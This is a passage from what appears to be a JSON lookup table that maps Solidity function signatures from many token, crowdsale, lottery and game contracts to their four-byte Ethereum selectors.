"0x6b3e2f97", "createDiamond(string,address,string,string,string,string,string)": "0x1e23300b", "_isDiamondVerified(string)": "0x81d16e0d", "_isDiamondOutside(string)": "0x12b8ca5e", "_burn(string)": "0x77fc35e5", "_transfer(address,address,string)": "0x4718d108", "_transferInternal(string,address,string,address,string,uint256,uint256)": "0x8860d49f", "_createDiamond(string,address,string,string,string,string,string)": "0xabe65ec9", "addressToAsciiString(address)": "0xa9ead91c", "KudosToken(string,string,string,uint8,address)": "0xbe400cad", "newKudosToken(string,string,string,uint8,address)": "0xa42dc008", "KudosTokenFactory()": "0x119d9bfe", "KudosPoll(string,string,uint8,uint256,uint256,uint256)": "0xc10f5075", "newKudosPoll(string,string,uint8,uint256,uint256,uint256)": "0x3444189b", "KudosPollFactory()": "0x37a58bb4", "getPollResultsSize()": "0xa61c48f0", "getPollResult(uint256)": "0xc888fcc3", "getPollResults()": "0x0564a9a7", "getKudosSentFromTo(address,address)": "0x07fb7c60", "DTToken()": "0xc5007227", "ClassicToken(string,string,uint8,uint256)": "0xaa9f3666", "BCEK(uint256,string,string)": "0xf99e574b", "buyToken()": "0xa4821719", "adminAddICO(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xaf7d1890", "adminBurn(uint256)": "0xbadb97ff", "CoVEXTokenERC223()": "0x06c30e84", "setHolder(address)": "0xd979f5aa", "onIncome()": "0xd47c0fb0", "getEther(uint256)": "0xf04961ba", "sendEther()": "0x0e29df22", "WTFToken()": "0x858f84e7", "voteSvp02(bool)": "0xe1f69952", "voteSvp01(bool)": "0x3c648ddd", "VoteSvp001(address,uint256,uint256)": "0x00b3c619", "setVoter(uint256,address,uint256)": "0xf6d72acd", "setVoterCount(uint256)": "0xb74cf3b6", "removeAccountReader(address,address)": "0x365ce233", "addAccountReader(address,address)": "0x19c5ab4b", "removeAdmin(address,address)": "0x268959e5", "addAdmin(address,address)": "0x8a19b4d2", "isCurrentOrPastAccountReader(address,address)": "0xde1ff163", "isCurrentAccountReader(address,address)": "0x99a032ce", "isCurrentOrPastAdmin(address,address)": "0xe23f61f6", "isCurrentAdmin(address,address)": "0xd09cb807", "contractVersion()": "0xa0a8e460", "AuthenticationManager()": "0x0fb54f3a", "showCertificate()": "0x145cb459", "publishGraduatingClass(string)": "0xac9630fa", "PayPerView()": "0x09fcda87", "distributeFixed(address[],uint256)": "0xf09bfcc2", "distributeVariable(address[],uint256[])": "0xa028aa1b", "setTokenReward(address)": "0x2e1dc4b8", "checkMintSolution(uint256,bytes32,bytes32,uint256)": "0x81269a56", "getMintDigest(uint256,bytes32,bytes32)": "0x97566aa0", "getMiningReward()": "0x490203a7", "getMiningTarget()": "0x32e99708", "getMiningDifficulty()": "0x17da485f", "getChallengeNumber()": "0x4ef37628", "_reAdjustDifficulty()": "0x62f60954", "_startNewMiningEpoch()": "0x40c87214", "GPUxToken()": "0x578b08e2", "limitLessThan(uint256,uint256)": "0x63cf2ef3", "reInitialize(address,address)": "0x61362b68", "updateExchangeRates(uint256,uint256)": "0xdb6c709c", "_getSubscription(bytes32,address)": "0x966f697c", "transferSubscription(bytes32,address)": "0x25017e10", "hasValidSubscription(bytes32,address)": "0xb14f8432", "buy(bytes32,uint256)": "0x0ddeb632", "getSubscriptionTo(bytes32)": "0x53f81ef8", "getSubscription(bytes32,address)": "0x5f28cb74", "claimProductOwnership(bytes32)": "0x1a464fa1", "offerProductOwnership(bytes32,address)": "0x96002aef", "redeployProduct(bytes32)": "0x58f816bf", "_initialize(address,address)": "0xe5c9c2ed", "Marketplace(address,address)": "0x0cc69a27", "airdrop(address,address[],uint256[])": "0x025ff12f", "SencToken()": "0xe815b60d", "Operatable()": "0x8b3caf37", "isSecondaryOperator(address)": "0x124cf830", "isPrimaryOperator(address)": "0x281027b9", "setSecondaryOperator(address)": "0x5f94e3de", "setPrimaryOperator(address)": "0xb2ccda0e", "TokenDeskProxy(address,uint256)": "0x0630da28", "buyTokens(address,address,uint256)": "0xdcefa538", "withdrawToOwner(uint256)": "0x6a5bbc1d", "setSelling(bool)": "0xfce3bbb5", "setBuyRate(uint256)": "0x85e436bf", "GZSToken(uint256,string,uint8,string)": "0x1c23281c", "freeze()": "0x62a5af3b", "allocateReserveTokens()": "0x3e260a2c", "allocateStrategicTokens()": "0x2165fef9", "deliver(address,uint256,bytes32)": "0xb2e774ce", "updateTokenSaleState()": "0x3fa1436e", "CHEXToken(address,address,uint256,uint256)": "0x512ff2c9", "pct(uint256,uint256,uint256)": "0x7d091a7e", "callBackVariations()": "0x675f6d1e", "registerVariation(uint256,address)": "0x2d0b7d53", "createVariation(uint256,uint256)": "0x7b039bb6", "setLotteryAddress(address)": "0x2a332b2a", "Variation(address,address)": "0xe88bc2ba", "setVariationCycle(uint256)": "0x2a5f6a0f", "setVariationProbably(uint256)": "0x3065d22c", "getCLottery()": "0x1d4f3e8b", "isLottery()": "0x25698d89", "sendMoney(address,uint256)": "0xee4ae2c9", "getDog(uint256)": "0x7c62e2a4", "setApprovedUser(address)": "0x329d5f0f", "startIco()": "0x89311e6f", "finishPre()": "0xc8ad27e6", "startPre()": "0x4d129fb5", "uploadFinish()": "0xda1b4359", "uploadData(bytes)": "0x69cef46c", "batchTransferEther(address[],uint256)": "0x309e6005", "removeAddressFromBlacklist(address)": "0x35e82f3a", "addAddressToBlacklist(address)": "0xf2c816ae", "XJF()": "0xba9e0907", "setMaxBetThresholdPct(uint256)": "0x6ab872f0", "setGameRunning(bool)": "0xd5bcf8ef", "setMinBet(uint256)": "0x88ea41b9", "drop()": "0xf751cd8f", "VLTToken()": "0xe9bd48b8", "isSigned(address,bytes32,uint8,bytes32,bytes32)": "0x8677ebe8", "recoverAddr(bytes32,uint8,bytes32,bytes32)": "0xe5df669f", "configureSaleClockAuction(address,uint256)": "0x0b9ea95d", "disableManuallyMintTokens()": "0xca78e65b", "mintTokens(address[])": "0x3fa40f94", "customPayment(address,uint256)": "0x42d8f5be", "isIcoClosed()": "0x5856db43", "isReachedThreshold()": "0xf221abef", "getBonusByRaised()": "0x7bc69bbc", "processPayment(address,uint256,bool)": "0x56000acf", "mint(uint256,uint256,address)": "0xe7d3fe6b", "KickicoCrowdsale(address,address,address,address,address,address,address,address,address)": "0xdf1fc781", "changeServer(address)": "0x08fb8a88", "OEBCBank()": "0x3d75c49e", "MudshotsToken()": "0x9ef1fbc4", "publicGetNote(uint64,bytes2)": "0x645e175c", "getMyNotes(uint64,uint64)": "0xbc2bbad7", "getMyNote(uint64)": "0xc62cfa1d", "getNotesCount()": "0x8596982d", "updateNoteButContent(uint64,uint16,bytes12)": "0x9acbdcab", "updateNoteTitle(uint64,bytes12)": "0x5928e80c", "updateNoteContent(uint64,bytes)": "0x6d33f5a6", "updateNoteMetadata(uint64,uint16)": "0xcc2f5029", "updateNote(uint64,uint16,bytes12,bytes)": "0x43c09e77", "deleteNote(uint64)": "0xaedbbf36", "createNote(uint16,bytes2,bytes12,bytes)": "0x72b59c68", "isPosBitOne(uint256,uint256)": "0x76c6dc8b", "removeFromPrivateWhitelist(address)": "0x58db3258", "addToPrivateWhitelist(address)": "0x7fde24c7", "TriggminePresale()": "0x53a4c8a3", "CCH_EDIT_1()": "0x98683105", "updatePurchasingState(address,uint256)": "0x88945187", "processPurchase(address,uint256)": "0x78547d5f", "postValidatePurchase(address,uint256)": "0xf4d76b60", "HopeToken()": "0x006ae9d5", "ViewGold()": "0x575ed3de", "VirginMToken()": "0x9c392e5c", "getOrderTakerTokenAmount()": "0x6029f53f", "getOrderMakerTokenAmount()": "0xeec65c58", "getOrderHash()": "0x9124f1cf", "getEthCapPerAddress()": "0x7e4d4495", "fillOrderWithEth()": "0xa76769a5", "initializeSale(address[5],uint256[6],uint8,bytes32,bytes32,uint256,uint256)": "0x3eccd456", "TokenSale(address,address,address)": "0x07f5b7a2", "kBit()": "0x9720dd5a", "enableCodeExport()": "0xe46f9ecf", "enableExchange(uint256)": "0x3a3b955b", "changeDeDeNetwork(address)": "0xffb5fc2a", "installDonationContract(address)": "0xed6e85c7", "DeDeTokenContract(address)": "0xa95236ed", "SNOOP()": "0x39bbaed2", "ETU()": "0x92202126", "GWGF(uint256,string,string)": "0xca4d1435", "sendAllLocalEthers(address)": "0x430ab56a", "airdrop(address[],uint256,uint256,uint256)": "0xb74f32f2", "calculateTokensEnabledforAirdrop(address[],uint256)": "0x5346dcc5", "sendMiningProfit(address[],uint256)": "0x602a3fee", "calculateTokensEnabledOne(address,uint256)": "0x6285a259", "poptxs(address,uint256)": "0xde637901", "pushtx(address,uint256)": "0xe5820af7", "NDUXBase()": "0x9f9a9b7d", "setpricefactor(uint256)": "0x0df12532", "caltoken()": "0xa45f2057", "Kotlind()": "0x43e41c44", "NILEX()": "0x5b21a8b0", "MTSCoin()": "0x07c533a5", "sTks(address,uint256)": "0xcfe3b8fb", "CarboneumToken()": "0x715d574e", "getsubscribersSinceLastHatch(address)": "0x7ec3e63e", "getMysubscribers()": "0x8f68b36f", "getYouTubemasterReq()": "0x29cca3ae", "getMyCraigGrant()": "0xa728fa93", "getFreeCraigGrant()": "0x9ebb5d3c", "calculatesubscribersell(uint256)": "0xe80d2ef8", "buysubscribers()": "0x67df1187", "sellsubscribers()": "0x715d4a64", "hatchsubscribers(address)": "0x67923240", "becomeYouTubemaster()": "0x926dfd5e", "CraigGrantShrimper()": "0x38abdf41", "USD_Omnidollar()": "0x717a945a", "AntarctiCoin()": "0xca001903", "GCRTokenERC20()": "0x6323dc26", "Altcoin()": "0xe5e5cfac", "CiceroToken()": "0x923a4227", "Bittoq(uint256,string,uint8,string)": "0x4d51fad6", "OwnedUpgradeabilityProxy()": "0xdf59cbeb", "refundOwner()": "0x8c47ddcc", "resumePresale()": "0x54f63ee5", "pausePresale()": "0x070f5c09", "Presale(uint256,address,address,address,uint256,uint256,uint256,uint256)": "0x1d6ca15d", "addTenParticipants(address,address,address,address,address,address,address,address,address,address)": "0x8554d60a", "addFiveParticipants(address,address,address,address,address)": "0x21f4911a", "addMultipleParticipants(address[])": "0x05529d94", "resumeWhitelist()": "0x2a7b3d4d", "pauseWhitelist()": "0xd2080ccd", "isParticipant(address)": "0x929066f5", "changeTradeTracker(address)": "0x48d64fd5", "changeFeeModifiers(address)": "0x4f3f2cbc", "autoPay()": "0xbbc32820", "startEarlyStage3()": "0x7e457b85", "admin2()": "0x06a8f8a2", "getTotalPercent()": "0x3c8e3b52", "GasBuy()": "0x990502d0", "totalDistanceRun()": "0x764c86bd", "publishOwner()": "0xe60fb021", "minimunEth()": "0x320228ca", "goldFee()": "0x7f4da132", "minPriceInWeiForPre()": "0x634b3df9", "preciowea()": "0x5c221385", "bTest()": "0xf99638a5", "registrationTime()": "0x1e2e7a06", "DatingCoinToken()": "0xb9beeb8d", "latchContract()": "0x5d2392d6", "createrAddress()": "0xfb9b4ab8", "securityTokenRegistry()": "0xce4dbdff", "amountOfTokensPoolD()": "0xc0ea537b", "MIN_VALUE()": "0x992c15fc", "TOKENS_FOR_OPERATIONS()": "0x2a8f6aa8", "icoPhase3TimeBonusInPercentage()": "0x6ae81ae1", "getChecksumCount()": "0x5044b112", "PRESALE_STARTTIMESTAMP()": "0xb097bdbd", "indFutureDeposit()": "0x22c07ad3", "coreAddress()": "0x1c0ad646", "distributeTime()": "0xb76bf76b", "bonusMinContribution()": "0xc5715483", "nthWagerPrizeN()": "0x8f5665ce", "usdCentsBalance()": "0xcf5c2ac7", "priceLimit()": "0xf0e1ba2c", "percentsOfProjectComplete()": "0xc3e1d25c", "isAllocated6()": "0xf70dd1fe", "voteToken()": "0x160d66ae", "fifthTeamWithdrawal()": "0x25cbd68e", "tgeStartBlock()": "0x30007ed3", "advisorAddress()": "0x96d4d091", "totalEtherPaid()": "0x32fe334b", "withdrawOlder()": "0x4e1bdfdf", "balancesUploaded()": "0xed0cc2e1", "priorityCap()": "0x7535c930", "soldOnCurrentSale()": "0xf49501f3", "finalizeDescription()": "0xfca129a3", "getLastCallKey()": "0x3664a0ea", "investorsTotalSupply()": "0xa1e4cb30", "reserveTokenFund()": "0x0b4e0513", "getMinGasPrice()": "0x3fb58819", "MAX_NUM_OF_CHOICES()": "0x8d22651e", "checkContract()": "0x338116b0", "ICO_PRICE5()": "0x42ee4e0b", "ANY()": "0xa8542f66", "indInflation()": "0x73b24ca0", "wolkSale()": "0xf2e1192a", "acceptDonate()": "0xe41d0944", "ICO_START1()": "0x7a362fe1", "withdrawn()": "0xc80ec522", "firstBonusPercent()": "0xc588cabd", "initialiseToken()": "0xc846690b", "ethertoteDevelopmentTransferComplete()": "0xd247160a", "shitFundAddress()": "0xecbc3177", "airDropShadowTag()": "0x30cc1d18", "numberOfCyclePlayers()": "0x2bd00610", "minCWCsPerReturnMoreThan()": "0xa6df6c30", "nextrafflenumber()": "0xc39cf53d", "TOURNAMENT_WALLET()": "0x762e3816", "maxPurchaseNum()": "0x92a04621", "depositsAddress()": "0x4d84ba37", "teamAmountLeft()": "0x92e11e24", "dataStore()": "0x660d0d67", "strategicAllocation()": "0x885463fd", "maxTokens()": "0xe8315742", "Investors()": "0x879bfa27", "NEXT_POT_FRAC_TOP()": "0x9af28b65", "US_INSTITUTIONAL()": "0xcc21e972", "owner_share()": "0xc6610dec", "foundersFundTimelock3Address()": "0x5e8a6044", "allowSell()": "0x36e0f6cc", "pgoUnlockedLiquidityWallet()": "0xea515c98", "saleBonus()": "0x5f9bad28", "DUST_LIMIT()": "0x42193473", "Numtokens()": "0xb4a66678", "getRoundIssued()": "0x2fd47643", "COMMUNITY()": "0xf8d7f790", "isAcceptingPayments()": "0x92d9e3b8", "startTimePreICO()": "0xb324fb6b", "getDealCancelRate()": "0x286012b0", "sharePot()": "0x8bd7df6e", "nextLotteryTTMTokenId4()": "0x454481dd", "addressSupporters()": "0x6eb5bef0", "mainEtherReceived()": "0xe1590ed7", "maxMineSize()": "0x50e17308", "MINER_END_PRICE()": "0xf6ea6252", "deadline120()": "0x32c6f294", "_presaleEndTimestamp()": "0x6cc2c668", "getDiscipleNum()": "0xa12e429c", "isPersonalBonuses()": "0x82fa9c0d", "pausePreIco()": "0x2a93b5bb", "totalFundsAvailable()": "0xac1f7ca1", "tokenContributionCap()": "0x6c84a4bf", "maximumTokenIssue()": "0x4d493f24", "tokensPerWeiBonus250()": "0xb928024d", "GRVToken()": "0x27972e8f", "Qripplex()": "0x29fd06cf", "DCOIN()": "0x4516b707", "getRoundNum()": "0xd843e40a", "setRoundNum(uint256)": "0xdea95ff8", "IOSToken()": "0x8fd23762", "GPaid()": "0xb16f4a3a", "topupSupply(uint256)": "0x1c25f452", "burnProvider(address)": "0x97046afc", "approveProvider(address,uint256)": "0x8e0e8fb2", "_sendTranche(bytes32,address,address,uint256,bytes,bytes)": "0x0d260b60", "issueByTranche(bytes32,address,uint256,bytes)": "0x73c8de54", "canSend(address,address,bytes32,uint256,bytes)": "0x3ecae564", "setDocument(bytes32,string,bytes32)": "0x010648ca", "operatorRedeemByTranche(bytes32,address,uint256,bytes)": "0xf157c54b", "redeemByTranche(bytes32,uint256,bytes)": "0xd962c51e", "burn(bytes32,address,uint256,bytes)": "0x5edf413e", "mint(bytes32,address,uint256,bytes)": "0xc014875f", "isOperatorForTranche(bytes32,address,address)": "0x3781e576", "revokeOperatorByTranche(bytes32,address)": "0xcd9a7a56", "authorizeOperatorByTranche(bytes32,address)": "0x5c025e03", "defaultOperatorsByTranche(bytes32)": "0x163687ab", "tranchesOf(address)": "0xe3da9f8f", "trancheByIndex(address,uint256)": "0x0357088b", "operatorSendByTranche(bytes32,address,address,uint256,bytes,bytes)": "0x3b8dbf6d", "sendByTranche(bytes32,address,uint256,bytes)": "0xfb913d14", "sendTranche(bytes32,address,uint256,bytes)": "0x54990b15", "balanceOfByTranche(bytes32,address)": "0x4b901b72", "setDefaultTranche(bytes32[])": "0xf4af9146", "getDefaultTranches(address)": "0xf3be07eb", "moveNapkinsTo(uint256,address)": "0x4c062c81", "sellNapkins(uint256)": "0xb39d49fe", "buyNapkins(address)": "0x41fcb0f7", "countdownIsUp()": "0xece67270", "UroToken()": "0x6154db6e", "claimReward(string)": "0xbb8c9797", "temroyToken()": "0x74674256", "IAmVeryPoorToken()": "0x05aecc80", "getWithdrawTransactionIds(uint256,uint256,bool,bool)": "0xc4f07cff", "getStakeholderConfirmations(uint256)": "0xb50bf8cb", "getWithdrawConfirmations(uint256)": "0x1a4e9a6c", "getStakeholders()": "0xb6992247", "getStakeholderTransactionCount(bool,bool)": "0xaae8312e", "getWithdrawTransactionCount(bool,bool)": "0xa7ca3010", "getStakeholderConfirmationCount(uint256)": "0x14a59e9d", "getWithdrawConfirmationCount(uint256)": "0x658e587f", "addStakeholderTransaction(address,bool)": "0xb6176a33", "addWithdrawTransaction(address,uint256,bytes)": "0x7a86d3d6", "isConfirmedStakeholder(uint256)": "0xb6172704", "isConfirmedWithdraw(uint256)": "0x85a2675b", "executeStakeholderTransaction(uint256)": "0x8e5e91ac", "executeWithdrawTransaction(uint256)": "0xd77ec4a4", "revokeStakeholderConfirmation(uint256)": "0xe6758649", "revokeWithdrawConfirmation(uint256)": "0x0a3e5712", "confirmStakeholderTransaction(uint256)": "0xc324606a", "confirmWithdrawTransaction(uint256)": "0x96cea3f7", "submitStakeholderTransaction(address,bool)": "0x6a2f78a6", "submitWithdrawTransaction(address,uint256,bytes)": "0x0c1e3fd4", "_removeStakeholder(address)": "0x872b31b6", "removeStakeholder(address)": "0xbcb0c2d7", "_addStakeholder(address)": "0xf518e66d", "addStakeholder(address)": "0xe5c42fd1", "Trie()": "0x224854f7", "_isReserveUnlocked()": "0x4367aa3c", "_getCurrentStage()": "0xd24c8fe4", "_setReserveHolders()": "0x16d64127", "_setStages(uint256,int256)": "0xac99f7b7", "unlockReserve()": "0xaf577c4c", "mintReserve()": "0x890ac366", "_currentTime()": "0xea0930f2", "getRoundDividendPerBBTHelper(uint256)": "0x5bc5c1a8", "getPlayerLeftDividend(address)": "0x4c7fa728", "getPlayerTotalDividend(address)": "0xdffb0bd1", "getPlayerRoundDividend(address,uint256)": "0x607267d3", "getRoundsCount()": "0xa09686c4", "circulationAt(uint256)": "0x735b81ab", "BerryLakeCoin()": "0xfa0d5b52", "GLXChain()": "0x8df4d225", "ArtsCoin()": "0xac67857e", "justPureFunction(int256)": "0x3bf2cade", "readFromStorageView()": "0x45350b6b", "writeToStorage()": "0xe711da27", "tradetxToken()": "0x4a950db6", "Count(uint256,uint256)": "0x4bca893d", "Icebox(uint256)": "0x4fdf4c9a", "JRT()": "0x8ea51696", "getBirthDay()": "0xd7354b49", "getBirthMonth()": "0xe7cfafce", "getBirthYear()": "0x85e612e4", "impl_redeem(address,uint256)": "0xa7fab81a", "impl_cancelRedeem(address,uint256)": "0x43de34dc", "impl_apply4Redeem(address,uint256)": "0x240e07e0", "impl_batchTransferMSM(address,address[],uint256[])": "0x0afdca95", "impl_transferMSM(address,address,uint256)": "0x6f109879", "impl_transferMSI(address,address,uint256)": "0xbbd2e059", "impl_transferMS(address,address,uint256)": "0xc6a118d4", "impl_unlock4Circulate(address,uint256)": "0x21da1719", "impl_lock4Dividend(address,uint256)": "0xad66de24", "impl_cancelOrder(address,uint256,bool)": "0x2b1fcc10", "impl_purchase(address,bool,bool)": "0x767180d0", "syncFunds()": "0x08956ff8", "withdrawCeo(address)": "0x97d814c3", "transferPaladinOwnership(address)": "0x8a68ae3c", "transferKnightOwnership(address)": "0x5bb31436", "transferJokerOwnership(address)": "0x28a7f25d", "deployChildren(address)": "0xd7c74279", "_shiftRight(bytes32,uint256)": "0xc3736dfa", "_shiftLeft(bytes32,uint256)": "0xff4b6fea", "_increaseRarity(uint256,bytes32)": "0x25e330fb", "_generate_special_horsey(address,address,address,bytes32)": "0xc7216a44", "_makeSpecialId(address,address,bytes32)": "0xc039b88c", "_feed(uint256,bytes32)": "0x0c45453c", "stopFeeding()": "0x8f6348b8", "feed(uint256)": "0xf59dfdfb", "getHorsey(uint256)": "0x48481979", "getCarrotCredits()": "0xf9394c10", "freeForCarrots(uint256)": "0x976a77b6", "renameHorsey(uint256,string)": "0x41a0be7b", "can_claim(address,address,address)": "0x4e102951", "addHorseIndex(bytes32)": "0x03a503a4", "addLegitDevAddress(address)": "0x62d1fee3", "setClaimingCosts(uint256)": "0x38e9e6b5", "setRenamingCosts(uint256)": "0xea87003c", "setCarrotsMultiplier(uint8)": "0x19a96e72", "setRarityMultiplier(uint8)": "0x6ef181a8", "unstoreHorsey(uint256)": "0x407d1a0c", "modifyHorseyTier(uint256,uint8)": "0x5e44e0a4", "modifyHorseyFeedingCounter(uint256,uint8)": "0x8e57d397", "modifyHorseyDna(uint256,bytes32)": "0xf0793782", "modifyHorsey(uint256,address,bytes32,uint8,uint8)": "0xac4bed68", "storeHorsey(address,uint256,address,bytes32,uint8,uint8)": "0x79032fa7", "storeCarrotsCredit(address,uint32)": "0x9e35ff3e", "storeName(uint256,string)": "0x214b146f", "getOwnedTokens(address,address)": "0xd387c4c1", "_isWinnerOf(address,address,address)": "0x23087c04", "getall_horsesCount()": "0xef520aba", "_addLegitOwner(address)": "0xedcf2ad4", "_addHorse(bytes32)": "0x12a3bbaf", "_removeTokenFromBarn(uint256,address)": "0xee2a1ec1", "purchaseToken(uint256)": "0xc2db2c42", "depositToExchange(uint256,uint256)": "0x53636220", "getTokensOnSale(address)": "0x9bbba3a8", "setMarketFees(uint256)": "0xff4ab29c", "setStables(address)": "0x08e130c9", "ESMBCoin()": "0x5621df99", "SmartIdeaTokenERC20(uint256,string,string)": "0xfa5f090b", "RDWToken()": "0x47b98c2e", "CypherX()": "0xc5b43c39", "updatefundingEndTime(uint256)": "0xcef94360", "updatefundingStartTime(uint256)": "0x861654f7", "changeWaitTime(uint256)": "0x06fe2212", "checkWithdrawValueForAddress(address,uint256)": "0x63f114f2", "checkWithdrawValue(uint256)": "0x8f11e5f9", "requestWithdrawal(uint256)": "0x9ee679e8", "icoDenominatorPrice()": "0xfa0d80fc", "allocatePresaleTokens(address,uint256)": "0x8fee7687", "updatePriceAndDenominator(uint256,uint256)": "0x24038339", "updatePriceDenominator(uint256)": "0xdbb24554", "setOfferTime(uint256)": "0x1df411a6", "STC(address,uint256,uint256,uint256)": "0x6c419326", "distributeInvest(uint256,uint256,uint256)": "0x07471b18", "setCore(address)": "0x80009630", "onlyApprovedOrOwnerOfToken(uint256,address,bool)": "0xd0376283", "getTokenURIs(uint256,bool)": "0xe1674588", "getTokenCount(bool)": "0x7a1aeb3c", "getTokensForSale(bool)": "0x9187300e", "updateItem(uint256,uint8,uint8,uint256,uint256,uint256,uint256,uint256,bool,bool)": "0x5e7b9832", "updateChamp(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,bool)": "0x0def3866", "updateAddressInfo(address,address,uint256,bool,uint256,bool,uint256,bool,string,bool)": "0x900104da", "newItem(uint8,uint8,uint256,uint256,uint256,uint256,uint256,bool,bool,address)": "0xa60956a6", "newChamp(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,bool,address)": "0x344c0dd5", "transferToken(address,address,uint256,bool)": "0x811ea6de", "setTokensForSaleCount(uint256,bool)": "0x8e2e2077", "setTokenToOwner(uint256,address,bool)": "0xeb0fb0a3", "setTokenOperatorApprovals(address,address,bool,bool)": "0xe109ef24", "setTokenApproval(uint256,address,bool)": "0x0d325b29", "setLeaderboard(uint256,uint256)": "0xbd0a0e85", "setChampsName(uint256,string)": "0x50c6ef88", "clearTokenApproval(address,uint256,bool)": "0x29f6d9c3", "addWithdrawal(address,address,uint256)": "0x4e4e7862", "chAllowAirdrop(bool)": "0xfe277aba", "chAllowTransfer(bool)": "0x18f873df", "chAirDropFshare(uint256)": "0xe579ebeb", "chAirDropFadd(uint256)": "0x28292af2", "chAirDropLimit(uint256)": "0xddb72188", "offlineExchange(address,uint256)": "0x7b8c0e0f", "activation(uint256,address)": "0x1327487f", "specialAddress(address)": "0x9bacc97c", "getCurrentNumberOfUsedServiceTokenWei()": "0x914ae352", "getWithdrawAmount(address,address)": "0xa998fdbe", "IWasFirstShareToken()": "0x82ce6523", "setShareTokenAddress(address)": "0x1e1a4eef", "getServiceTokenAddress()": "0x9c632c77", "setServiceTokenAddress(address)": "0x64d17c08", "getNumberOfTokens()": "0xefeecb51", "getHashByTokenId(uint256)": "0x9456f7e9", "getTokenIdByHash(string)": "0x5e22a2fb", "updateMetadata(string,string)": "0x56ce0e6c", "getCreatorMetadataOfHistoricalMetadata(string,uint256)": "0xa3e1f666", "getCreationDateOfHistoricalMetadata(string,uint256)": "0x5e03d0c6", "COE()": "0x0c7f27ba", "getNewPetCard(uint8,uint8)": "0x4e91f906", "createTeams()": "0xfe038093", "ArtBC(uint256,string,uint8,string)": "0x5629c69e", "updateValueAndBurn(uint256,uint256)": "0x67dbaf93", "updateValueAndMint(uint256,uint256,int256)": "0xb07bbefd", "transferCentralBanking(address)": "0xe7199f82", "ValueToken()": "0x041dd0f9", "validPurchase(address)": "0xb01ab46d", "transferProfit(uint256,uint256)": "0x5ffc7cc7", "XPAAssets(uint256)": "0xb0bb3759", "closeTurnByHand(uint32)": "0x9afd46a3", "getOverPLayer()": "0x40b14606", "getLunckyInfo()": "0x2e279344", "closeThisTurn()": "0xed1627e9", "clearBetMap()": "0x87000d42", "startNewTurn()": "0x76823637", "getLunckyIndex(uint256)": "0x42abfde8", "coinback(uint256)": "0xf9683828", "batchTransfer()": "0x3a0d6350", "CCH_EDIT_4()": "0x186e378a", "URB()": "0xd4ff60cb", "WEBcoin()": "0x4e42b632", "LibraToken()": "0x8447c4fa", "getBancorContractAddress()": "0x624964c3", "convertToInd()": "0xd150fbe6", "setDestinationWallet(address)": "0x13fa095f", "setMinConversionRate(uint256)": "0xa215cd92", "setBancorRegistry(address)": "0xc6ce2664", "icoOverview()": "0xd1397162", "buySaleTokens(address)": "0x153a79c9", "buyPresaleTokens(address)": "0x4bbcd6e8", "getTokenCreationRate()": "0x43dc7233", "BBDToken(uint256,uint256,uint256,uint256)": "0xd34b6cd3", "ThiccCoin()": "0x42a7c40e", "HALToken()": "0xf7e502cb", "callBurnTokens(uint256)": "0xf099fbbd", "callStages()": "0x8abf344d", "referralTokens(address,uint256)": "0x6a785191", "WRLCrowdsale()": "0xae041b90", "WRLToken()": "0x4fa65d58", "getRateStages(uint256)": "0xa007bc45", "getStage3Start()": "0xdcd4090b", "getStage2Start()": "0xa6a5bfe3", "getStage1Start()": "0xf36e20db", "getStage0Start()": "0x0f8bca8c", "getStage3End()": "0x0caa8605", "getStage2End()": "0x253f055b", "getStage1End()": "0xf315e81d", "getStage0End()": "0x63e94cee", "getStage3Cap()": "0x350279c6", "getStage2Cap()": "0x3fa2dd2a", "getStage1Cap()": "0xebffd7e3", "getStage0Cap()": "0xf0369550", "transferToRef(address,uint256)": "0x0dee302e", "getRefAddress()": "0x3f9ce517", "getTokensHolder()": "0x566a3cb5", "tokensDistributed()": "0x152e84a7", "automaticWithdrawLoop(uint256,uint256)": "0xeaa0e760", "beneficiarySend()": "0x3e6a6a31", "individualClaim()": "0x18958959", "MaecenasToken()": "0x394fc3a6", "lockUntil(uint256,string)": "0xb26eafe4", "lockFromSelf(uint256,string)": "0xb66dd4b2", "HOWEOToken()": "0x71726f69", "setExchangeRate(address)": "0x9978f01b", "MithrilOre()": "0xd0e95ded", "checkGoalsReached()": "0x3883aee2", "buyerBalance(address)": "0x1bd60ae9", "AquaSale(address,uint256,uint256,uint256,uint256,address,address,address,address,address,address,uint256)": "0x3c2e6b32", "getAquaTokenAudCentsPrice()": "0x15de8027", "getAudCentWeiPrice()": "0x4a4a2569", "addReferral(address,address)": "0x0b5c3f87", "addPresaleAmount(address,uint256)": "0xcc577f38", "updateETHEUR(uint256)": "0x7d8d4878", "updateEthICOVariables(uint256,uint256)": "0x34bb3ee1", "get_FTVTOKEN_EURCENT(uint256)": "0x35a5c43a", "calcTokens(uint256)": "0xd562a121", "issueTokensWithReferral(address,uint256)": "0x5e8f5022", "issueTokensToUser(address,uint256)": "0x766e4f2c", "FTV(address,address,address,address,address)": "0x6d181a42", "FairDistributionToken()": "0xe6bc7d2a", "ImagodeiToken()": "0xea1cf495", "returnBalanseToTarget()": "0x770b80b6", "listAgents()": "0xd6cd4a02", "getTarget()": "0xf00e6a2a", "AgentContract(address,address,address,uint256,uint256)": "0xdfb06d85", "AltCurrency(uint256,string,string)": "0x02618eb2", "GSCT()": "0x724020be", "create_a_new_market(address,uint256,uint256,uint256)": "0xbea24735", "get_amount_minus_commission(uint256)": "0xaf43f597", "reactivate_trading()": "0x0608a48a", "deactivate_trading()": "0x10c452ef", "seed_additional_eth()": "0xac9c80af", "seed_additional_token(uint256)": "0x7e63dd86", "seed_eth()": "0x3f5ab2fe", "set_eth_as_seeded()": "0x7aa5a1a8", "deposit_token(uint256)": "0xf57ad6ea", "getNowTime()": "0x9b819d38", "getBlockTime()": "0x87ceff09", "scheduleTransaction(address,uint256,uint256,bytes)": "0xb67fabdf", "scheduleTransaction(address,uint256,bytes)": "0x44dd4b5e", "scheduleTransaction(address,uint256,uint256,uint256)": "0xd0549602", "scheduleTransaction(address,uint256,uint256)": "0x02e8d8c0", "scheduleTransaction(address,uint256)": "0x447cd682", "scheduleTransaction(uint256,uint256,uint256,bytes)": "0x1099d3ec", "scheduleTransaction(uint256,uint256,bytes)": "0xe33c7ae2", "scheduleTransaction(uint256,bytes)": "0xf0a78538", "scheduleTransaction(uint256,uint256,uint256)": "0xcf158fe9", "scheduleTransaction(uint256,uint256)": "0x57e2880d", "scheduleTransaction(uint256)": "0xed4b1d0d", "scheduleTransaction(uint256,address,bytes,uint256)": 